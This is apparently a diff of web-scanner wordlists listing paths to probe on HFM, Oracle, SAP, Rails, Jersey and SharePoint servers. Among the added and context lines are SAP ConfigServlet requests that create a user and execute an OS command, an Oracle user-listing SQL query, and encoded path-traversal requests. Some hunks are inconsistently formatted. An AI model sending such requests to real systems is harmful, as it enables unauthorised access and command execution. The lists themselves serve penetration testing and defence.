 HFM/LoadExtract/LoadRules.asp
 HFM/LoadExtract/LoadSecurity.asp
 HFM/LoadExtract/LoadTransactions.asp
 HFM/LoadExtract/ProcessExtractJournals.asp
 HFM/LoadExtract/ProcessExtractMemberlists.asp
 HFM/LoadExtract/ProcessExtractMetaData.asp
 HFM/LoadExtract/ProcessExtractRules.asp
 HFM/LoadExtract/ProcessExtractSecurity.asp
 HFM/LoadExtract/ProcessJournalsExtractTree.asp
 HFM/LoadExtract/ProcessLoadData.asp
 HFM/LoadExtract/ProcessLoadJournals.asp
 HFM/LoadExtract/ProcessLoadMemberLists.asp
 HFM/LoadExtract/ProcessLoadRules.asp
 HFM/LoadExtract/ProcessLoadSecurity.asp
 HFM/LoadExtract/ProcessLoadTransactions.asp
 HFM/LoadExtract/ProcessTransactionsExtractTree.asp
 HFM/LoadExtract/downloadictlog.asp
 HFM/LoadExtract/loaddata.asp
 HFM/LoadExtract/loadmeta.asp
 HFM/LoadExtract/loadmeta_options.asp
 HFM/LoadExtract/processExtractTransactions.asp
 HFM/Logon
 HFM/Logon/AuthenticateUser.asp
 HFM/Logon/Logoff.asp
 HFM/Logon/ProcessLogoff.asp
 HFM/Logon/ProcessLogon.asp
 HFM/Logon/SSO.asp
 HFM/MbrSel
 HFM/MbrSel/MbrSel.asp
 HFM/MbrSel/MbrSelXml.asp
 HFM/MbrSel/MbrSel_Include.asp
 HFM/MbrSel/MbrSel_Test.asp
 HFM/OpenApp
 HFM/OpenApp/CloseApp.asp
 HFM/OpenApp/CloseApplication.asp
 HFM/OpenApp/DisplayServers.asp
 HFM/OpenApp/HsvJSConstantsServer_OpenApp.asp
 HFM/OpenApp/OpenAppDirect.asp
 HFM/OpenApp/ReopenAppDirect.asp
 HFM/OpenApp/SelectApp.asp
 HFM/OpenApp/SelectServer.asp
 HFM/OpenApp/ServerStatus.asp
 HFM/OpenApp/StartPage.asp
 HFM/OpenApp/appopen.asp
 HFM/OwnershipManagement
 HFM/OwnershipManagement/DisplayColumns.asp
 HFM/OwnershipManagement/EPU.xsl
 HFM/OwnershipManagement/EPUFilterOptions.asp
 HFM/OwnershipManagement/EPUReport.asp
 HFM/OwnershipManagement/EPU_Report.xsl
 HFM/OwnershipManagement/ManageEPU.asp
 HFM/OwnershipManagement/OwnershipManagement.asp
 HFM/OwnershipManagement/ProcessCalcEPU.asp
 HFM/OwnershipManagement/ProcessSharesCalculation.asp
 HFM/OwnershipManagement/SharesCalculation.asp
 HFM/POV
 HFM/POV/POVCommon.asp
 HFM/POV/POVRequestData.asp
 HFM/POV/povfinishpage.asp
 HFM/POV/povstartpage.asp
 HFM/ProcessManagement
 HFM/ProcessManagement/ProcessFlowHistory.asp
 HFM/ProcessManagement/ProcessFlowManagement.asp
 HFM/ProcessManagement/ProcessFlowValidationDetail.asp
 HFM/ProcessManagement/ProcessManagement.asp
 HFM/ProcessManagement/ProcessManagementSummary.asp
 HFM/Reports
 HFM/Reports/AddICPAccount.asp
 HFM/Reports/DynamicICP.asp
 HFM/Reports/EditReport.asp
 HFM/Reports/HsvJSConstantsServer_Reports.asp
 HFM/Reports/ICPCommon.asp
 HFM/Reports/ICPReportBuilder.asp
 HFM/Reports/ICPReports.asp
 HFM/Reports/OpenLocalReports.asp
 HFM/Reports/OpenRemoteReport.asp
 HFM/Reports/OpenRemoteReports.asp
 HFM/Reports/PrintJournalReportOverride.asp
 HFM/Reports/PrintReports.asp
 HFM/Reports/ProcessICPGetEntity.asp
 HFM/Reports/ProcessICPPOV.asp
 HFM/Reports/ProcessICPReports.asp
 HFM/Reports/ProcessJournalReports.asp
 HFM/Reports/ProcessJournalReportsPov.asp
 HFM/Reports/ProcessOpenLocalReports.asp
 HFM/Reports/ReportFormatOptions.asp
 HFM/Reports/SaveJournalReportLocal.asp
 HFM/Reports/SaveLocal.asp
 HFM/Reports/checkStatus.asp
 HFM/Security
 HFM/Security/GetClasses.asp
 HFM/Security/GetUsers.asp
 HFM/Security/TestSecurityHarness.asp
 HFM/Security/bpm
 HFM/Security/bpm/BpmLauncher.asp
 HFM/Security/bpm/BpmLauncher.xml
 HFM/Security/bpm/BpmUi_Version.xml
 HFM/Security/bpm/asp
 HFM/Security/bpm/asp/tree.asp
 HFM/Security/bpm/conf
 HFM/Security/bpm/conf/BpmContextConfig.xml
 HFM/Security/bpm/conf/BpmContextConfig.xsd
 HFM/Security/bpm/conf/BpmDebugConfig.xml
 HFM/Security/bpm/conf/BpmReleaseConfig.xml
 HFM/Security/bpm/conf/HfmConfig.xml
 HFM/Security/bpm/launcher.asp
 HFM/Security/bpm/modules
 HFM/Security/bpm/modules/com
 HFM/Security/bpm/modules/com/hyperion
 HFM/Security/bpm/modules/com/hyperion/bpm
 HFM/Security/bpm/modules/com/hyperion/bpm/web
 HFM/Security/bpm/modules/com/hyperion/bpm/web/containers
 HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard
 HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard/Adf.asp
 HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop
 HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/Adf.asp
 HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header
 HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header/header.inc
 HFM/Security/bpm/modules/com/hyperion/hfm
 HFM/Security/bpm/modules/com/hyperion/hfm/web
 HFM/Security/bpm/modules/com/hyperion/hfm/web/appcontainer
 HFM/Security/bpm/modules/com/hyperion/hfm/web/appcontainer/Adf.asp
 HFM/Security/bpm/modules/com/hyperion/hfm/web/prefs
 HFM/Security/bpm/modules/com/hyperion/hfm/web/prefs/Adf.asp
 HFM/Security/bpm/resources
 HFM/Security/conf
 HFM/Security/conf/HfmConfig.xml
 HFM/Security/createSecurityClass.asp
 HFM/Security/deleteSecurityClass.asp
 HFM/Security/getRights.asp
 HFM/Security/getRightsAndRoles.asp
 HFM/Security/getRoles.asp
 HFM/Security/getUsersInGroup.asp
 HFM/Security/modules
 HFM/Security/modules/com
 HFM/Security/modules/com/hyperion
 HFM/Security/modules/com/hyperion/hfm
 HFM/Security/modules/com/hyperion/hfm/web
 HFM/Security/modules/com/hyperion/hfm/web/security
 HFM/Security/modules/com/hyperion/hfm/web/security/appnode
 HFM/Security/modules/com/hyperion/hfm/web/security/appnode/Adf.asp
 HFM/Security/modules/com/hyperion/hfm/web/security/assign
 HFM/Security/modules/com/hyperion/hfm/web/security/assign/Adf.asp
 HFM/Security/modules/com/hyperion/hfm/web/security/assign/AssignRights.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/assign/DataSet.xml
 HFM/Security/modules/com/hyperion/hfm/web/security/assign/DataSet.xsd
 HFM/Security/modules/com/hyperion/hfm/web/security/classes
 HFM/Security/modules/com/hyperion/hfm/web/security/classes/Adf.asp
 HFM/Security/modules/com/hyperion/hfm/web/security/classes/Classes.xsd
 HFM/Security/modules/com/hyperion/hfm/web/security/report
 HFM/Security/modules/com/hyperion/hfm/web/security/report/Adf.asp
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserGroupCSV.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserGroupHTML.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsAndRolesCSV.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsAndRolesHTML.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsCSV.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsHTML.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRolesCSV.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRolesHTML.xsl
 HFM/Security/modules/com/hyperion/hfm/web/security/users
 HFM/Security/modules/com/hyperion/hfm/web/security/users/Adf.asp
 HFM/Security/modules/com/hyperion/hfm/web/security/users/Users.xsd
 HFM/Security/olapsample.csv
 HFM/Security/saveAsCsv.asp
 HFM/Security/saveRights.asp
 HFM/Security/securityAssignmentWizard.asp
 HFM/Security/setSelectedClasses.asp
 HFM/Security/setSelectedUsers.asp
 HFM/ThirdParty
 HFM/ThirdParty/Bindows
 HFM/ThirdParty/Bindows/html
 HFM/ThirdParty/Bindows/html/BiWsdlBuiltinTypes.xsd
 HFM/ThirdParty/Bindows/html/bimain.html
 HFM/ThirdParty/Bindows/html/blank.html
 HFM/Workspace
 HFM/Workspace/EmptyWorkspace.asp
 HFM/Workspace/Preferences.asp
 HFM/Workspace/Workspace.asp
 HFM/Workspace/WorkspaceCommon.asp
 HFM/Workspace/WorkspaceFlow.asp
 HFM/default.asp
 HFM/favicon.ico
 HFM/global.asa
--- a/wordlists/vulnerabilities/iplanet.txt
+++ b/wordlists/vulnerabilities/iplanet.txt
@@ -14,7 +14,6 @@ admpw
 agents
 bin
 ca
 ca
 cgi-bin
 config
 dirb_random.cgi
--- a/wordlists/vulnerabilities/jersey.txt
+++ b/wordlists/vulnerabilities/jersey.txt
@@ -1,121 +0,0 @@
 JAXBElement
 SimpleServlet/resources/start
 XmlRootElement
 XmlType
 aircrafts
 application.wadl
 assembly.xml
 atom/application.wadl
 atom/collection
 atompub-contacts-client
 atompub-contacts-models
 atompub-contacts-server
 bookmark
 bookmark-em
 bookmarks
 bookstore
 changes
 changes/latest
 collection
 contacts
 containers
 count
 data
 ejb
 emptyArrayResource
 entity-provider
 extended-wadl-webapp
 extended-wadl-webapp/application.wadl
 flights
 form
 form/colours
 generate-wadl
 groovy
 helloworld
 helloworld-webapp
 helloworld-webapp/helloworld 
 https-clientserver-grizzly
 https-server-glassfish
 httpsBasicAuth-webapp/helloworld
 item
 item/content
 item/content/1
 jacksonjsonprovider
 jacksonjsonprovider/application.wadl
 jacksonjsonprovider/emptyArrayResource
 jacksonjsonprovider/nonJAXBResource
 jaxb
 jaxb/JAXBElement
 jaxb/XmlRootElement
 jaxb/XmlType
 jaxb/array/XmlRootElement
 jaxb/array/XmlType 
 jaxb/collection/XmlRootElement
 jaxb/collection/XmlType
 jcdi-beans-webapp
 jcdi-beans-webapp/ejb/stateless
 jcdi-beans-webapp/jcdibean/dependent/per-request
 jcdi-beans-webapp/jcdibean/dependent/singleton
 jcdi-beans-webapp/jcdibean/per-request
 jcdi-beans-webapp/jcdibean/singleton
 jcdibean
 jersey-autowired 
 jersey-ejb
 jersey-ejb/app/messages
 jersey-ejb/app/messages/1
 jmaki-backend
 json-from-jaxb
 jsonfromjaxb/aircrafts
 jsonfromjaxb/application.wadl
 jsonfromjaxb/flights
 jsonp
 jsonp/changes
 managed-beans-webapp
 mandel
 mandelbrot
 markup
 nonJAXBResource
 occ/item
 occ/item/content/0
 optimistic-concurrency
 per-request
 pom.xml
 printers
 printers/ids/1
 printers/jMakiTable 
 printers/jMakiTree
 printers/list
 properties
 resources/application.wadl
 resources/form
 resources/form/colours
 resources/start
 scala-helloworld-webapp
 service
 simple-atom-server
 simple-console
 simple-servlet
 singleton
 sparklines
 sparklines/discrete
 spring-annotations
 spring-aop
 spring-aop/subresource
 spring-autowired
 spring-resourced
 spring/jersey-autowired 
 spring/spring-aop 
 spring/spring-aop/subresource 
 spring/spring-autowired 
 spring/spring-resourced 
 start
 stateless
 storage-service
 storage/containers
 storage/containers/quotes
 time
 users
 users/
 users/1
 users/1/bookmarks
 users/1/bookmarks/1
--- a/wordlists/vulnerabilities/juicy_files.txt
+++ b/wordlists/vulnerabilities/juicy_files.txt
--- a/wordlists/vulnerabilities/oracle.txt
+++ b/wordlists/vulnerabilities/oracle.txt
@@ -40,15 +40,12 @@ JSP
 NFIntro.htm
 OA_HTML/
 OA_HTML/AppsLocalLogin.jsp
-OA_HTML/PTB/mwa_readme.htm
+OA_HTML/ibeCAcpSSOReg.jsp
 OA_HTML/oam/weboam.log
 OA_JAVA/
 OHW
 OnlineOrders_html/
 OnlineOrders_html/login.jsp
 Oracle
 OracleASjms
 README
 RedirectServlet
 RequestHeaderExample
 RequestInfoExample
@@ -65,12 +62,12 @@ ToJSPServlet
 ViewSrc
 WEB-INF/config.xml
 WebCacheDemo.html
-XSQLConfig.xml
+[
 ]
 _pages
 _pages/
 _pages/_demo/
 _pages/_demo/_ojspext/_events/_index.java
 _pages/_demo/_sql/
 _pages/_demo/_sql/_pages/
 _pages/_webapp/_admin/_showjavartdetails.java
 _pages/_webapp/_admin/_showpooldetails.java
@@ -79,7 +76,6 @@ admin/
 admin_/
 admin_ejb
 adminoc4j
 apex/
 aplogon.html
 appdet.html
 aqserv/servlet
@@ -226,7 +222,6 @@ demo/xml/helloxml/index.html
 demo/xml/index.html
 demo/xml/xmlquery/XMLQuery.jsp
 demo/xml/xmlquery/index.html
 demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
 dev60cgi/f60cgi
 dev60cgi/ifcgi60.exe
 dev60cgi/rwcgi60
@@ -324,7 +319,6 @@ inventory/
 isqlplus
 isqlplus/
 j2ee
 j2ee/
 j2ee/OC4J_Demos
 j2ee/examples/jsp/
 j2ee/examples/jsp/cal/calendar.html
@@ -405,7 +399,6 @@ logs
 master/
 mesg/
 mod_ose.html
 mod_ose_docs
 mod_ose_docs/
 myapp
 myapp/
@@ -421,7 +414,6 @@ oas
 oc4j
 oc4j-status
 oc4jadmin
 oem_webstage/oem.conf
 oiddas
 oiddas/
 oiddas/oiddashome.uix
@@ -694,8 +686,6 @@ onlineorders_html/
 oprocmgr-service
 oprocmgr-status
 oracle
 oracle/
 oradata/
 orasso
 orasso/
 orasso/orasso.home
@@ -738,7 +728,6 @@ ows-bin/owa
 ows-bin/owa/admin_/
 ows-bin/ows-binqlapp
 ows-bin/ows-binqlapp/admin_/
 ows-bin/perlidlc.bat?&di
 ows-bin/portal
 ows-bin/portal2
 ows-bin/portal2/admin_/
@@ -771,7 +760,6 @@ petstore
 pls
 pls/
 pls/Workflow/wfa_html.home
 pls/admin
 pls/admin_/gateway.htm
 pls/admin_/globalsettings.htm
 pls/admin_/help/..%255Cplsql.conf
@@ -792,7 +780,6 @@ pls/help/
 pls/htmldb
 pls/htmldb/apex_admin
 pls/htmldb/htmldb
 pls/ldc/admin_/
 pls/myapp
 pls/myapp/admin_/
 pls/mydad
@@ -815,7 +802,6 @@ pls/portal309/admin_/
 pls/portal/admin_/
 pls/portal/null
 pls/portal/owa_util.cellsprint
 pls/portal/owa_util.cellsprint?p_theQuery=select
 pls/portal/owa_util.listprint
 pls/portal/owa_util.show_query_columns
 pls/portal/owa_util.showsoucre
@@ -829,12 +815,8 @@ pls/register/account.welcome
 pls/register/reg.signup
 pls/sample
 pls/sample/admin_/
 pls/sample/admin_/help/..%255cplsql.conf
 pls/simpledad
 pls/simpledad/admin_/
 pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
 pls/simpledad/admin_/gateway.htm?schema=sample
 pls/simpledad/admin_/globalsettings.htm
 pls/ssodad
 pls/ssodad/admin_/
 pls/test
@@ -872,32 +854,15 @@ repdemo/runJSPIAS.html
 repdemo/runrepIAS.html
 reports/examples/Tools/test.jsp
 reports/rwservlet
 reports/rwservlet 
 reports/rwservlet/delauth
 reports/rwservlet/getserverinfo
 reports/rwservlet/getserverinfo 
 reports/rwservlet/help?command=delauth
 reports/rwservlet/help?command=getjobid
 reports/rwservlet/help?command=getserverinfo
 reports/rwservlet/help?command=help
 reports/rwservlet/help?command=killengine
 reports/rwservlet/help?command=killjobid
 reports/rwservlet/help?command=parsequery
 reports/rwservlet/help?command=showauth
 reports/rwservlet/help?command=showenv
 reports/rwservlet/help?command=showjobid
 reports/rwservlet/help?command=showjobs
 reports/rwservlet/help?command=showmyjobs
 reports/rwservlet/killengine
 reports/rwservlet/killjobid
 reports/rwservlet/parsequery
 reports/rwservlet/showauth
 reports/rwservlet/showenv
 reports/rwservlet/showjobid
 reports/rwservlet/showjobs
 reports/rwservlet/showmap
 reports/rwservlet/showmyjobs
 reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
 richtextportlet/info
 root.sh
 ruleauthor
@@ -953,12 +918,10 @@ soap/admin/servicemanager
 soap/admin/servlet/soaprouter
 soap/servlet/Spy
 soap/servlet/soaprouter
 soapConfig.xml
 soapbuilder/
 soapbuilder/r2/InteropTest
 soapdocs/
 soapdocs/ReleaseNotes.html
 soapdocs/webapps/soap/
 soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
 sqlj
 sqlj/
@@ -1058,7 +1021,6 @@ xsql/airport/airport.xsql
 xsql/airport/airportSoap.html
 xsql/classerr/invalidclasses.xsql
 xsql/demo/adhocsql/query.xsql
 xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
 xsql/demo/airport/airport.xsql
 xsql/document/docdemo.html
 xsql/doyouxml/doyouxml.xsql
--- a/wordlists/vulnerabilities/ror.txt
+++ b/wordlists/vulnerabilities/ror.txt
@@ -1,5 +1,6 @@
 .gitignore
 Gemfile
 Gemfile.lock
 README
 README.rdoc
 Rakefile
@@ -26,7 +27,10 @@ assets/jquery.js
 config
 config.ru
 config/application.rb
 config/application.yml
 config/boot.rb
 config/cable.yml
 config/database-example.yml
 config/database.yml
 config/deploy.rb
 config/environment.rb
@@ -34,6 +38,7 @@ config/environments
 config/environments/development.rb
 config/environments/production.rb
 config/environments/test.rb
 config/graphql.js
 config/initializers
 config/initializers/backtrace_silencers.rb
 config/initializers/inflections.rb
@@ -43,9 +48,21 @@ config/initializers/session_store.rb
 config/initializers/wrap_parameters.rb
 config/locales
 config/locales/en.yml
 config/mongoid-example.yml
 config/mongoid.yml
 config/puma.rb
 config/routes.rb
 config/secrets.yml
 config/sidekiq-example.yml
 config/sidekiq.yml
 config/spring.rb
 config/storage.yml
 config/vue.js
 config/webpacker-example.yml
 config/webpacker.yml
 config/yetting.yml
 core
-create  
+create
 db
 db/seeds.rb
 dispatch.cgi
@@ -113,6 +130,9 @@ test/unit
 test/unit/.gitkeep
 tmp/cache
 tmp/cache/assets
 user/sign_in.html
 user/sign_in.json
 user/sign_in.xml
 vendor/assets/javascripts
 vendor/assets/javascripts/.gitkeep
 vendor/assets/stylesheets
--- a/wordlists/vulnerabilities/sap.txt
+++ b/wordlists/vulnerabilities/sap.txt
@@ -2,7 +2,6 @@
 ADS-EJB
 ADS-License
 AE/index.jsp
 AdapterFramework/version/version.jsp
 Adobe
 AdobeDocumentServices/Config
 AdobeDocumentServices/Config?wsdl
@@ -17,7 +16,6 @@ CAFDataService/Config
 CAFDataService/Config?wsdl
 CMSRTS/Config1
 CMSRTS/Config1?wsdl
 CPACache/refresh?mode=full
 DataArchivingService
 GRMGHeartBeat
 GRMGWSTest/service
@@ -73,8 +71,6 @@ VC
 WSConnector/Config1
 WSConnector/Config1?wsdl
 WSConnector/Config2
 XIAxisAdapter/MessageServlet
 XISOAPAdapter/MessageServlet?channel=:INTEGRATION_SERVER_
 _default
 apidocs/
 apidocs/allclasses-frame.html
@@ -96,34 +92,32 @@ caf
 ccsui
 com~tc~lm~webadmin~httpprovider~web
 ctc
-ctc/ConfigTool
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
-ctc/servlet
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 dispatcher
 dswsbobje
 dtr_lite
 ecatt
-entrypoints/recent 
+entrypoints/recent
 examples
 examples.html
 examples/
 examples_frame.html
 exchangeProfile
 exchangeProfile 
 exchangeProfile/
 guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
 htmlb
 htmlb/
 htmlb/index.html
 index.html
 infoviewapp
 inspection.wsil
 ipcpricing/ui/
 irj
 irj/go/km/basicsearch
 irj/go/km/details
 irj/go/km/docs
-irj/go/km/docs/etc/public/mimes/images 
+irj/go/km/docs/etc/public/mimes/images
-irj/go/km/docs/etc/xmlforms 
+irj/go/km/docs/etc/xmlforms
 irj/go/km/docs/ume/users
 irj/go/km/highlightedcontent
 irj/go/km/navigation
@@ -171,16 +165,13 @@ modeller/index.html
 monitoring
 monitoringProvierRoot
 nwa
 nwa
 performanceProvierRoot
 pmi
 portal
 portalapps
 rep
 rep/build_info.html
 rep/build_info.jsp
 rep/start/index.jsp
 rep/start/index.jsp
 run/build_info.html
 run/build_info.jsp
 rwb/version.html
@@ -190,9 +181,9 @@ samlssodemo_source
 sap
 sap/
 sap/IStest
 sap/XI/engine/?type=entry
 sap/admin
 sap/admin/default.html
 sap/admin/index.html
 sap/ap
 sap/bc
 sap/bc/
@@ -214,9 +205,9 @@ sap/bc/bsp
 sap/bc/bsp/
 sap/bc/bsp/esh_os_service/favicon.gif
 sap/bc/bsp/sap
 sap/bc/bsp/sap
 sap/bc/bsp/sap/
 sap/bc/bsp/sap/SXSLT_DEMO
 sap/bc/bsp/sap/WebServiceBrowser/search.html
 sap/bc/bsp/sap/absenceform_new
 sap/bc/bsp/sap/alertinbox
 sap/bc/bsp/sap/alertinboxwap
@@ -228,7 +219,7 @@ sap/bc/bsp/sap/brf_info
 sap/bc/bsp/sap/bsp_dlc_frcmp
 sap/bc/bsp/sap/bsp_model
 sap/bc/bsp/sap/bsp_veri
-sap/bc/bsp/sap/bsp_verificatio 
+sap/bc/bsp/sap/bsp_verificatio
 sap/bc/bsp/sap/bsp_vhelp
 sap/bc/bsp/sap/bsp_wd_base
 sap/bc/bsp/sap/bsp_wd_comp_spl
@@ -294,7 +285,7 @@ sap/bc/bsp/sap/hap_document
 sap/bc/bsp/sap/hap_q_profile
 sap/bc/bsp/sap/hr_expert
 sap/bc/bsp/sap/htmlb_samples
-sap/bc/bsp/sap/htmlb_samples                             
+sap/bc/bsp/sap/htmlb_samples
 sap/bc/bsp/sap/ic_base
 sap/bc/bsp/sap/ic_frw_notify
 sap/bc/bsp/sap/iccmp_bp_cnfirm
@@ -307,7 +298,7 @@ sap/bc/bsp/sap/icf_notify_poll
 sap/bc/bsp/sap/icfrecorder
 sap/bc/bsp/sap/icm
 sap/bc/bsp/sap/it00
-sap/bc/bsp/sap/it00                                      
+sap/bc/bsp/sap/it00
 sap/bc/bsp/sap/it01
 sap/bc/bsp/sap/it02
 sap/bc/bsp/sap/it03
@@ -322,7 +313,7 @@ sap/bc/bsp/sap/public
 sap/bc/bsp/sap/public/
 sap/bc/bsp/sap/public/FormGraphics
 sap/bc/bsp/sap/public/bc
-sap/bc/bsp/sap/public/bc                                 
+sap/bc/bsp/sap/public/bc
 sap/bc/bsp/sap/public/graphics
 sap/bc/bsp/sap/rmpspb_case
 sap/bc/bsp/sap/rmpspb_casenote
@@ -335,11 +326,11 @@ sap/bc/bsp/sap/sapterm
 sap/bc/bsp/sap/sbsp_dal_demo
 sap/bc/bsp/sap/sbspext_bsp
 sap/bc/bsp/sap/sbspext_htmlb
-sap/bc/bsp/sap/sbspext_htmlb                                                                    
+sap/bc/bsp/sap/sbspext_htmlb
 sap/bc/bsp/sap/sbspext_phtmlb
 sap/bc/bsp/sap/sbspext_table
 sap/bc/bsp/sap/sbspext_xhtmlb
-sap/bc/bsp/sap/sbspext_xhtmlb                             
+sap/bc/bsp/sap/sbspext_xhtmlb
 sap/bc/bsp/sap/scpbspconvertuc
 sap/bc/bsp/sap/sem_upwb
 sap/bc/bsp/sap/sf_webform_01
@@ -387,6 +378,7 @@ sap/bc/bsp/sap/sxidemo_agcy_ui
 sap/bc/bsp/sap/sxms_alertrules
 sap/bc/bsp/sap/sxslt_training
 sap/bc/bsp/sap/system
 sap/bc/bsp/sap/system
 sap/bc/bsp/sap/system640
 sap/bc/bsp/sap/system_priv_01
 sap/bc/bsp/sap/system_priv_02
@@ -394,7 +386,6 @@ sap/bc/bsp/sap/system_priv_03
 sap/bc/bsp/sap/system_private
 sap/bc/bsp/sap/system_public
 sap/bc/bsp/sap/system_test
 sap/bc/bsp/sap/system                                    
 sap/bc/bsp/sap/t_sam_demo
 sap/bc/bsp/sap/thtmlb_scripts
 sap/bc/bsp/sap/thtmlb_styles
@@ -425,7 +416,6 @@ sap/bc/bsp/sap/wsi_oci_bsp_mvc
 sap/bc/bsp/sap/xi_pf_perf_moni
 sap/bc/bsp/sap/xi_pf_test
 sap/bc/bsp/sap/xmb_bsp_log
 sap/bc/bsp/sap                                            
 sap/bc/bsp/scmb
 sap/bc/bsp/scmb/df_web2
 sap/bc/bsp_dev
@@ -580,7 +570,6 @@ sap/bc/soap/wsdl
 sap/bc/soap/wsdl11
 sap/bc/soap/wsdlservices
 sap/bc/spi_gate
 sap/bc/spi_gate
 sap/bc/srm
 sap/bc/srm/rcm_webdav
 sap/bc/srm/rcm_webdav/
@@ -776,7 +765,7 @@ sap/bc/webdynpro/sap/demo_variable_dropdown
 sap/bc/webdynpro/sap/demo_wda_quiz
 sap/bc/webdynpro/sap/demo_wda_table
 sap/bc/webdynpro/sap/esh_adm_smoketest_ui
-sap/bc/webdynpro/sap/esh_admin_ui_component 
+sap/bc/webdynpro/sap/esh_admin_ui_component
 sap/bc/webdynpro/sap/esh_eng_modelling
 sap/bc/webdynpro/sap/esh_search_results.ui
 sap/bc/webdynpro/sap/ios_test_helloworld_ms
@@ -942,11 +931,11 @@ sap/monitoring
 sap/monitoring/
 sap/monitoring/ComponentInfo
 sap/monitoring/SystemInfo
 sap/monitoring/SystemInfo
 sap/option
 sap/public
 sap/public/
 sap/public/bc
 sap/public/bc
 sap/public/bc/
 sap/public/bc/NWDEMO_MODEL
 sap/public/bc/NW_ESH_TST_AUTO
@@ -956,7 +945,7 @@ sap/public/bc/its
 sap/public/bc/its/
 sap/public/bc/its/designs
 sap/public/bc/its/mimes
-sap/public/bc/its/mimes/system/SL/page/hourglass.html 
+sap/public/bc/its/mimes/system/SL/page/hourglass.html
 sap/public/bc/its/mobile/itsmobile00
 sap/public/bc/its/mobile/itsmobile01
 sap/public/bc/its/mobile/rfid
@@ -966,7 +955,7 @@ sap/public/bc/pictograms
 sap/public/bc/sicf_login_run
 sap/public/bc/trex
 sap/public/bc/ur
-sap/public/bc/ur                                                    
+sap/public/bc/ur
 sap/public/bc/wdtracetool
 sap/public/bc/webdynpro
 sap/public/bc/webdynpro/
@@ -979,28 +968,27 @@ sap/public/bc/webdynpro/viewdesigner
 sap/public/bc/webicons
 sap/public/bc/workflow
 sap/public/bc/workflow/shortcut
 sap/public/bc                                                                    
 sap/public/bsp
 sap/public/bsp/sap
 sap/public/bsp/sap
 sap/public/bsp/sap/
 sap/public/bsp/sap/htmlb
-sap/public/bsp/sap/htmlb 
+sap/public/bsp/sap/htmlb
 sap/public/bsp/sap/public
 sap/public/bsp/sap/public
 sap/public/bsp/sap/public/
 sap/public/bsp/sap/public/ISE
 sap/public/bsp/sap/public/bc
-sap/public/bsp/sap/public/bc                             
+sap/public/bsp/sap/public/bc
 sap/public/bsp/sap/public/faa
 sap/public/bsp/sap/public/graphics
 sap/public/bsp/sap/public/graphics/
 sap/public/bsp/sap/public/graphics/jnet_handler
 sap/public/bsp/sap/public/graphics/mimes
-sap/public/bsp/sap/public                                                              
+sap/public/bsp/sap/system
 sap/public/bsp/sap/system
 sap/public/bsp/sap/system_public
-sap/public/bsp/sap                                       
+sap/public/bsp/sap/system_public
 sap/public/bsp/sap/system                                
 sap/public/bsp/sap/system_public                               
 sap/public/icf_check
 sap/public/icf_info
 sap/public/icf_info/
@@ -1032,7 +1020,6 @@ sap/xi/cache_ssl
 sap/xi/docu_apperror
 sap/xi/docu_syserror
 sap/xi/engine
 sap/xi/engine/?type=receiver
 sap/xi/engine_test
 sap/xi/simulation
 sap/xml/
@@ -1093,7 +1080,7 @@ webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/We
 webdynpro/dispatcher/sap.com/tc~wd~tools
 webdynpro/dispatcher/sap.com/tc~wd~tools/Explorer
 webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
-webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole 
+webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
 webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
 webdynpro/resources/sap.com/
@@ -1107,5 +1094,4 @@ wsnavigator/jsps/sendrequest.jsp
 wsnavigator/jsps/test.jsp
 wssproc/cert
 wssproc/plain
-wssproc/ssl
+wssproc/ssl
 xi/SFIHCM01
--- a/wordlists/vulnerabilities/sharepoint.txt
+++ b/wordlists/vulnerabilities/sharepoint.txt
@@ -56,7 +56,7 @@ _layouts/1033/createws.aspx
 _layouts/1033/cspp1.aspx
 _layouts/1033/cspp2.aspx
 _layouts/1033/default.aspx
-_layouts/1033/default.aspx 
+_layouts/1033/default.aspx
 _layouts/1033/deletemu.aspx
 _layouts/1033/deleteweb.aspx
 _layouts/1033/discbar.aspx
@@ -292,7 +292,7 @@ _layouts/3082/createws.aspx
 _layouts/3082/cspp1.aspx
 _layouts/3082/cspp2.aspx
 _layouts/3082/default.aspx
-_layouts/3082/default.aspx 
+_layouts/3082/default.aspx
 _layouts/3082/deletemu.aspx
 _layouts/3082/deleteweb.aspx
 _layouts/3082/discbar.aspx
@@ -519,11 +519,11 @@ _layouts/avreport.aspx
 _layouts/backlinks.aspx
 _layouts/barcodeimagefromitem.aspx
 _layouts/bdcadminui/addbdcaction.aspx
-_layouts/bdcadminui/addbdcapplication.aspx  
+_layouts/bdcadminui/addbdcapplication.aspx
-_layouts/bdcadminui/bdcapplications.aspx    
+_layouts/bdcadminui/bdcapplications.aspx
-_layouts/bdcadminui/bdcentities.aspx           
+_layouts/bdcadminui/bdcentities.aspx
-_layouts/bdcadminui/editbdcaction.aspx         
